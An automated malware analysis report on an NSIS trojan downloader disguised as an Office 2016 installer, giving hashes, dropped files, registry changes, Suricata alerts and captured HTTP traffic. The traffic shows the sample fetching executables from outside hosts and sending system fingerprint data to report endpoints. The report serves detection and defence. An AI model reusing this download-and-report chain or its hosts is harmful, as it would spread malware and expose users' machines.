Trojan.NSIS.StartPage_ef04622cab

by malwarelabrobot on April 11th, 2018 in Malware Descriptions.

Trojan.GenericKD.12794050 (BitDefender), Trojan:Win32/Tiggre!rfn (Microsoft), Trojan-Downloader.NSIS.Adload.bx (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.Vittalia.7648 (DrWeb), Trojan.GenericKD.12794050 (B) (Emsisoft), RDN/Generic Downloader.x (McAfee), Trojan.Gen (Symantec), Win32:Malware-gen (AVG), Win32:Malware-gen (Avast), TROJ_GEN.R047C0DHD17 (TrendMicro), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, Malware

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: ef04622cab1dd61e1fa334064f92acd7
SHA1: de8cdb3b41d3e47578aa40fc3e060d25afe81086
SHA256: 8f539007e63bee3425d63205421948c495cd5dde89566da4ad79b582d00cff04
SSDeep: 6144:te34B/NEQq Rq/uMXOy7v9P92hWTnmPZ1HAND0uMiGrq4:9dRQ/ey7mhaTNg/h
Size: 334312 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company:
Created at: 2009-12-06 00:50:52
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

v2kPpgYau1.exe:3084
cpSetup.exe:3888

The Trojan injects its code into the following process(es):

setup.exe:3488
%original file name%.exe:4000

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process setup.exe:3488 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp\modern-header.bmp (25 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp\UserInfo.dll (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp\ioSpecial.ini (4557 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp\modern-wizard.bmp (26 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp\InstallOptions.dll (30 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AB.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp (0 bytes)

The process %original file name%.exe:4000 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\inetc.dll (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\5acc58219a70e[1].exe (2888 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\B (4232 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\VVBX80bLVD (172 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\launcher[1].htm (172 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\v2kPpgYau1.exe (3705 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9B.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp (0 bytes)

The process v2kPpgYau1.exe:3084 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsq65E5.tmp\268275370 (313 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsq65E5.tmp\nsArray.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsq65E5.tmp\cpSetup.exe (156691 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsq65E5.tmp\NSISdl.dll (30 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsq65E5.tmp\nsArray.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsq65E5.tmp\cpSetup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsq65E4.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsq65E5.tmp\NSISdl.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsq65E5.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsq65E5.tmp\268275370 (0 bytes)

The process cpSetup.exe:3888 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\normal_bg4[1].png (4541 bytes)

Registry activity

The process %original file name%.exe:4000 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\ef04622cab1dd61e1fa334064f92acd7_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\ef04622cab1dd61e1fa334064f92acd7_RASMANCS]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\ef04622cab1dd61e1fa334064f92acd7_RASAPI32]
"EnableFileTracing" = "0"
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3D 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\ef04622cab1dd61e1fa334064f92acd7_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\ef04622cab1dd61e1fa334064f92acd7_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process cpSetup.exe:3888 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1523305243"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "cpSetup.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"WindowClassName" = "DDEMLMom"

"processname" = "iexplore.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFavoritesInitialSelection"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFeedsInitialSelection"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

Dropped PE files

MD5	File path
92c08ce1c12da0d516f82142f5a1e15e	c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\5acc58219a70e[1].exe
c17103ae9072a06da581dec998343fc1	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\System.dll
c498ae64b4971132bba676873978de1e	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\inetc.dll
05230afdeeb13718e926fd654de63f12	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\setup.exe
92c08ce1c12da0d516f82142f5a1e15e	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\v2kPpgYau1.exe
325b008aec81e5aaa57096f05d4212b5	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp\InstallOptions.dll
c17103ae9072a06da581dec998343fc1	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp\System.dll
7579ade7ae1747a31960a228ce02e666	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp\UserInfo.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	23628	24064	4.46394	856b32eb77dfd6fb67f21d6543272da5
.rdata	28672	4764	5120	3.4982	dc77f8a1e6985a4361c55642680ddb4f
.data	36864	154712	1024	3.3278	7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata	192512	40960	0	0	d41d8cd98f00b204e9800998ecf8427e
.rsrc	233472	32168	32256	2.84253	a383d097c0b560d66c572d1b562b40bf

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 10
a21432b4813c70b95bf43d53d4987f45
4f24652c85093d6a6617d8319517e2da
b13adbe8321dc7adaa3790f824da7a38
40f650436cfa5e1e20e4419a67c2b809
c1766b65392e4495b3636ff593c6f075
662aa2b399c4987ee836230448650f76
d3e36afe2877c3643c31ea33eb8ada91
74e0eb4c506313016af2579773ef4b84
b49a6eb8b2bdcd69894cb122622ecc7f
141b9a9e221ead099e4392a66cc144cf

URLs

URL	IP
hxxp://dna4mm5c1mahl.cloudfront.net/launcher.php?p=sevenzip&tid=18778101&pid=539&n=TUlDUk9TT0ZUIE9mZmljZSBQUk8gUGx1cyAyMDE2IHYxNi4wLjQyMjkuMTAyMCBGaW5hbCBOb3YuVXBkYXRl&b_typ=pe
hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker.php?program=sevenzip&tid=18778101&pid=539&b_typ=pe&reb=1&name=MICROSOFT Office PRO Plus 2016 v16.0.4229.1020 Final Nov.Update
hxxp://dna4mm5c1mahl.cloudfront.net/launch_v5.php?p=&pid=539&tid=18778101&b_typ=pe&n=TUlDUk9TT0ZUIE9mZmljZSBQUk8gUGx1cyAyMDE2&reb=1&ic=
hxxp://d1yw350iozfqze.cloudfront.net/?affId=1006&appTitle=MICROSOFT
hxxp://lip.healthcakes.men/offer.php?affId=1006&trackingId=336034551&instId=11&ho_trackingid=HO336034551&cc=UA&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3&net=4.5.50709&ie=9.0.8112.16421&res=1276x846&osd=1601	52.85.17.68
hxxp://lip.healthcakes.men/installer.php?affId=1006&instId=11&ho_trackingid=HO3360345515acc5833a96a6&trackingId=336034551&cc=UA&untracked=&uac=1&osd=1601&net=4.5.50709&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3	52.85.17.68
hxxp://kiss.oatmealscene.loan/installer.php?affId=1006&instId=11&ho_trackingid=HO3360345515acc5833a96a6&trackingId=336034551&cc=UA&untracked=&uac=1&osd=1601&net=4.5.50709&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3	54.88.21.193
hxxp://d2adi7hu49xk5t.cloudfront.net/normal_bg4.png	52.85.17.135
hxxp://kiss.oatmealscene.loan/report.php?typ=sys&affId=1006&instId=11&ho_transId=HO3360345515acc5833a96a6&transId=336034551&chk_s_b=VMware-56 4d a7 48 b6 81 1f 90-3f 36 cc ce af 92 9a d2&chk_s_v=HPQOEM - 6040000&chk_c_ma=VMware, Inc.&chk_c_mo=VMware Virtual Platform&chk_mac=00:50:56:3C:AC:7120:41:53:59:4E:FF&randid=0.0000717088943324451	54.88.21.193
hxxp://kiss.oatmealscene.loan/report.php?typ=conversion&transId=336034551&affId=1006&instId=11&ho_transId=HO3360345515acc5833a96a6&s1=539&s2=18778101&s3=&s4=LP_DEF&s5=1326407960&cid=5c12d1104cca24294ae7d8d45ce8d028&uac=true&randid=0.6357091785874339	54.88.21.193
hxxp://d3vzyycpfbk7qm.cloudfront.net/stats.php?bu=cp&c=&step=
hxxp://1jptv.voluumtrk2.com/08e0b779-c1db-404a-b9a2-b4657d709f22
hxxp://d1g1b9l7554igi.cloudfront.net/pr/3e07b12e-e7d1-11e6-836f-02e33f60d095/typ_1.html
hxxp://d1g1b9l7554igi.cloudfront.net/pr/public/css/style.css
hxxp://d1g1b9l7554igi.cloudfront.net/pr/public/js/jquery.min.js
hxxp://d1g1b9l7554igi.cloudfront.net/pr/public/js/detector.js
hxxp://s3-1-w.amazonaws.com/ads.js?stam=err
hxxp://s3-1-w.amazonaws.com/pr/public/js/adframe.js
hxxp://d3vzyycpfbk7qm.cloudfront.net/stats.php?bu=&c=&step=1
hxxp://n135adserv.com/ads?key=3a71f57f6d976f956c5f61dbdd4adf7b&ch=&cp.chan=&cp.vtl=&cp.crr=&cp.exld=
hxxp://n135adserv.com/impression.gif?b=120492&p=5103&c=10390&h=177a937b0d9a7a39eee4f1dd260ad305&l=UA&sh=800&sw=1280&ad.trans.id=xtjmf1cl4aok&cps=Y2hhbg~dnRs~Y3Jy~ZXhsZA&s=03e8cba91683911ccd51608978f73922&t=1523341365531
hxxp://1049256531.rsc.cdn77.org/files135/65/10390/120492/FB_RU_800_Icons2.jpg
hxxp://d1g1b9l7554igi.cloudfront.net/favicon.ico
hxxp://d3vzyycpfbk7qm.cloudfront.net/stats.php?bu=&c=&step=2
hxxp://d3vzyycpfbk7qm.cloudfront.net/stats.php?bu=&c=&step=3
hxxp://d3vzyycpfbk7qm.cloudfront.net/stats.php?bu=&c=&step=4
bun.warspade.bid	52.85.17.225
ic-dc.bundlessafevault.com	52.85.17.60
ic-dc.s3.amazonaws.com	52.216.98.75
bun.companythings.bid	52.85.17.190
horn.matchthrill.bid	52.85.17.113
gold.powerstring.bid	52.85.17.55
www.1-1ads.com	212.124.115.196
trk.railquince.bid	18.196.14.115
ake.needmonth.bid	52.85.17.232

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET POLICY PE EXE or DLL Windows file download HTTP
ET TROJAN Backdoor User-Agent (InstallCapital)
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /08e0b779-c1db-404a-b9a2-b4657d709f22 HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: trk.railquince.bid

Connection: Keep-Alive


HTTP/1.1 302 Found

Cache-Control: no-store, no-cache, pre-check=0, post-check=0

Date: Tue, 10 Apr 2018 06:22:44 GMT

Expires: Thu, 01 Jan 1970 00:00:00 GMT

Location: hXXp://ic-dc.bundlessafevault.com/pr/3e07b12e-e7d1-11e6-836f-02e33f60d095/typ_1.html

Pragma: no-cache

Server: nginx

Set-Cookie: 08e0b779-c1db-404a-b9a2-b4657d709f22-v4=08e0b779-c1db-404a-b9a2-b4657d709f22;domain=trk.railquince.bid;path=/;HttpOnly

Set-Cookie: voluum-cid-v4={
  "cid" : "w2R2EF8L6VTQEU3DH6K5303Q",
  "caid" : "08e0b779-c1db-404a-b9a2-b4657d709f22"
};Max-Age=31536000;Expires=Wed, 10-Apr-2019 06:22:44 GMT;domain=trk.railquince.bid;path=/;HttpOnly

Content-Length: 0

Connection: keep-alive
HTTP/1.1 302 Found..Cache-Control: no-store, no-cache, pre-check=0, po
st-check=0..Date: Tue, 10 Apr 2018 06:22:44 GMT..Expires: Thu, 01 Jan 
1970 00:00:00 GMT..Location: hXXp://ic-dc.bundlessafevault.com/pr/3e07
b12e-e7d1-11e6-836f-02e33f60d095/typ_1.html..Pragma: no-cache..Server:
 nginx..Set-Cookie: 08e0b779-c1db-404a-b9a2-b4657d709f22-v4=08e0b779-c
1db-404a-b9a2-b4657d709f22;domain=trk.railquince.bid;path=/;HttpOnly..
Set-Cookie: voluum-cid-v4={
  "cid" : "w2R2EF8L6VT
QEU3DH6K5303Q",
  "caid" : "08e0b779-c1db-404a-b
9a2-b4657d709f22"
};Max-Age=31536000;Expires=Wed, 10-Apr-2019 06
:22:44 GMT;domain=trk.railquince.bid;path=/;HttpOnly..Content-Length: 
0..Connection: keep-alive..

GET /?affId=1006&appTitle=MICROSOFT Office PRO Plus 2016&s1=539&s2=18778101&setupName=cpSetup&appVersion=2.92&instId=11&exe=1 HTTP/1.0

Host: horn.matchthrill.bid

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*


HTTP/1.1 200 OK

Content-Type: application/octet-stream

Content-Length: 2294784

Connection: close

Server: nginx/1.10.1

Date: Tue, 10 Apr 2018 06:22:33 GMT

X-Powered-By: PHP/5.5.38

Content-Transfer-Encoding: Binary

Content-disposition: attachment; filename="cpSetup.exe"

X-Cache: Miss from cloudfront

Via: 1.1 42e68676a49ad69c68767a987640fbe2.cloudfront.net (CloudFront)

X-Amz-Cf-Id: secxPupQXfQurJznQBqVZPp4HXA41K5wHY8KCSHB_de85VwsOJ-T9g==

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......^J... ... ..
. ....... ......` ....... ..!u... ..!u... ..!u..? ...Sx.. ... ..} ...u
... ...u... ... |.. ...u... ..Rich. ..........................PE..L...
...Z.....................(".....X0............@.......................
...P#.......#...@...................................".P....."..O......
.............0#......U...............................U..@.............
..X............................text...k........................... ..`
.rdata....!.......!.................@..@.data.........".......".......
......@....gfids........".......".............@..@.rsrc....O...."..P..
..".............@..@.reloc.......0#.......".............@..B..........
......................................................................
......................................................................
......................................................................
............................................U....X....JA.S.]..E.V.5P.A
.W.E.....JA..E.......E..E..}..E.5...f....G..U.. ....E....E..E....=..@.
.E....E.....M.....U.3.3.P.E.Pj.S...E.......E.....M.3..E..E.3.P.E.Pj.S.
..E. E..E....t..U....}..E.WPh....S...u..E.Ph....S......m...}...W..._^[
..].U..j.h..@.d.....P..\......b.3..E.SVWP.E.d......}..u..M..U..G.=....
.........$.@..$...@.......PV..L.A.......P.h.b.j@h....P..P.A.j.j.j.V..H
.A.......PV..D.A.3..].....h.b.V.d....h.b..W.f........................D
...........X..u....u...h.b....|......X..r..h.b....................

<<< skipped >>>

GET /ads.js?stam=err HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://ic-dc.bundlessafevault.com/pr/3e07b12e-e7d1-11e6-836f-02e33f60d095/typ_1.html

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ic-dc.s3.amazonaws.com

Connection: Keep-Alive


HTTP/1.1 200 OK

x-amz-id-2: MpLAiXjBlnesCK3wdwr0CT8dzilCoOhbykw3qJ2Pqssgzi6scjvfspvtRQu5rh6cBjwdGmOOhTE=

x-amz-request-id: 348A908211C6D4F4

Date: Tue, 10 Apr 2018 06:22:46 GMT

Last-Modified: Thu, 12 Jan 2017 15:34:57 GMT

ETag: "bebd18b90969d9319e931acf4d682aa4"

x-amz-meta-cb-modifiedtime: Mon, 09 Jan 2017 12:15:17 GMT

Accept-Ranges: bytes

Content-Type: application/x-javascript

Content-Length: 24

Server: AmazonS3

window.adsAreOk2 = true.HTTP/1.1 200 OK..x-amz-id-2: MpLAiXjBlnesCK3wd
wr0CT8dzilCoOhbykw3qJ2Pqssgzi6scjvfspvtRQu5rh6cBjwdGmOOhTE=..x-amz-req
uest-id: 348A908211C6D4F4..Date: Tue, 10 Apr 2018 06:22:46 GMT..Last-M
odified: Thu, 12 Jan 2017 15:34:57 GMT..ETag: "bebd18b90969d9319e931ac
f4d682aa4"..x-amz-meta-cb-modifiedtime: Mon, 09 Jan 2017 12:15:17 GMT.
.Accept-Ranges: bytes..Content-Type: application/x-javascript..Content
-Length: 24..Server: AmazonS3..window.adsAreOk2 = true...

GET /launcher.php?p=sevenzip&tid=18778101&pid=539&n=TUlDUk9TT0ZUIE9mZmljZSBQUk8gUGx1cyAyMDE2IHYxNi4wLjQyMjkuMTAyMCBGaW5hbCBOb3YuVXBkYXRl&b_typ=pe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: bun.companythings.bid

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Content-Length: 172

Connection: keep-alive

Date: Tue, 10 Apr 2018 06:22:29 GMT

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

X-Cache: Miss from cloudfront

Via: 1.1 4001cc23eb32ec3ac8fe5303310fc493.cloudfront.net (CloudFront)

X-Amz-Cf-Id: HivUAMckC8jaEjZGlSzmOBdZ0uYvjQQFtHVQOa2HwOco7BRjaNSkoQ==
s=first..u=hXXp://ake.needmonth.bid/stub_maker.php?program=sevenzip&ti
d=18778101&pid=539&b_typ=pe&reb=1&name=MICROSOFT Office PRO Plus 2016 
v16.0.4229.1020 Final Nov.UpdateHTTP/1.1 200 OK..Content-Type: text/ht
ml; charset=UTF-8..Content-Length: 172..Connection: keep-alive..Date: 
Tue, 10 Apr 2018 06:22:29 GMT..Server: Apache/2.2.15 (CentOS)..X-Power
ed-By: PHP/5.3.3..X-Cache: Miss from cloudfront..Via: 1.1 4001cc23eb32
ec3ac8fe5303310fc493.cloudfront.net (CloudFront)..X-Amz-Cf-Id: HivUAMc
kC8jaEjZGlSzmOBdZ0uYvjQQFtHVQOa2HwOco7BRjaNSkoQ==..s=first..u=hXXp://a
ke.needmonth.bid/stub_maker.php?program=sevenzip&tid=18778101&pid=539&
b_typ=pe&reb=1&name=MICROSOFT Office PRO Plus 2016 v16.0.4229.1020 Fin
al Nov.Update..

GET /launch_v5.php?p=&pid=539&tid=18778101&b_typ=pe&n=TUlDUk9TT0ZUIE9mZmljZSBQUk8gUGx1cyAyMDE2&reb=1&ic= HTTP/1.0

Host: bun.warspade.bid

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*


HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Content-Length: 313

Connection: close

Date: Tue, 10 Apr 2018 06:22:31 GMT

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

X-Cache: Miss from cloudfront

Via: 1.1 14ddb67fb657f269f4087e4b3c5a9f59.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 443b85utUFIZj-cqyw30K1qei4MewLp40qcNpqcR6bReLAQakMDYZw==
files=5.t1=dl.u1=hXXp://horn.matchthrill.bid/?affId=1006&appTitle=MICR
OSOFT Office PRO Plus 2016&s1=539&s2=18778101&setupName=cpSetup&appVer
sion=2.92&instId=11&exe=1.n1=cpSetup.exe.b1=cp.c1=sevenzip-1.s1=0.m1=0
.d1=0.fn1=Components.fn2=File opener.fn3=File finder.fn4=SevenZip.ftit
le=to run your file.itype=silent...

GET /stats.php?bu=&c=&step=1 HTTP/1.0

Host: gold.powerstring.bid

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*


HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Content-Length: 0

Connection: close

Date: Tue, 10 Apr 2018 06:22:45 GMT

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

X-Cache: Miss from cloudfront

Via: 1.1 745a4b74c94cd415d3d1a79d835f24f5.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 03U3bupTXyjksi43rTwLVjT-z-I7_-md252iC95ZQaesQwejtG0rdQ==

GET /stats.php?bu=&c=&step=2 HTTP/1.0

Host: gold.powerstring.bid

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*


HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Content-Length: 0

Connection: close

Date: Tue, 10 Apr 2018 06:22:46 GMT

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

X-Cache: Miss from cloudfront

Via: 1.1 14ddb67fb657f269f4087e4b3c5a9f59.cloudfront.net (CloudFront)

X-Amz-Cf-Id: HD-Ci55ABJrFn9vChcT62SkchDjCNGYe8lYg6sG4gEWhzyLArMSMSQ==

GET /pr/3e07b12e-e7d1-11e6-836f-02e33f60d095/typ_1.html HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ic-dc.bundlessafevault.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: text/html

Content-Length: 1041

Connection: keep-alive

Date: Sun, 07 Jan 2018 06:31:08 GMT

Last-Modified: Tue, 20 Jun 2017 11:04:26 GMT

ETag: "1a020086610d48a917b9d08a84026ad5"

Accept-Ranges: bytes

Server: AmazonS3

Age: 84348

X-Cache: Hit from cloudfront

Via: 1.1 09696b72fd824c461b396d99379987a3.cloudfront.net (CloudFront)

X-Amz-Cf-Id: GjA_I5e5iabD4SHQ0Ryf9TAd5-1s1NSYEpHDuGljab0X6goSSv2kKQ==
<!doctype html>.<html>..<head lang="en">..<title&
gt;Thank you page</title>..<meta http-equiv="Content-Type" co
ntent="text/html; charset=UTF-8">..<meta name="viewport" content
="width=device-width, initial-scale=1">..<link rel="stylesheet" 
href="../public/css/style.css">..<script src="../public/js/jquer
y.min.js" type="text/javascript"></script>.</head>..<
;body>..<div class="wrapper">...<div class="header">...
.<div class="title">.....<div class="title-caption">Thank 
you for downloading!</div>....</div>...</div>...<
div class="content">....<div class="inner">.....<div class
="adnl_zone">.....</div>....</div>...</div>..<
/div>..<script type="text/javascript">...window.tagUrl = 'htt
p://VVV.1-1ads.com/ads?key=3a71f57f6d976f956c5f61dbdd4adf7b&ch=';..<
;/script>..<script src="hXXp://ic-dc.s3.amazonaws.com/pr/public/
js/adframe.js" type="text/javascript"></script>..<script s
rc="hXXp://ic-dc.s3.amazonaws.com/ads.js?stam=err" type="text/javascri
pt"></script>..<script src="../public/js/detector.js" type
="text/javascript"></script>.</body>..</html>.ont>....<<< skipped >>>

POST hXXp://lip.healthcakes.men/installer.php?affId=1006&instId=11&ho_trackingid=HO3360345515acc5833a96a6&trackingId=336034551&cc=UA&untracked=&uac=1&osd=1601&net=4.5.50709&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 HTTP/1.1

Host: lip.healthcakes.men

Connection: close

Accept: */*

User-Agent: InstallCapital

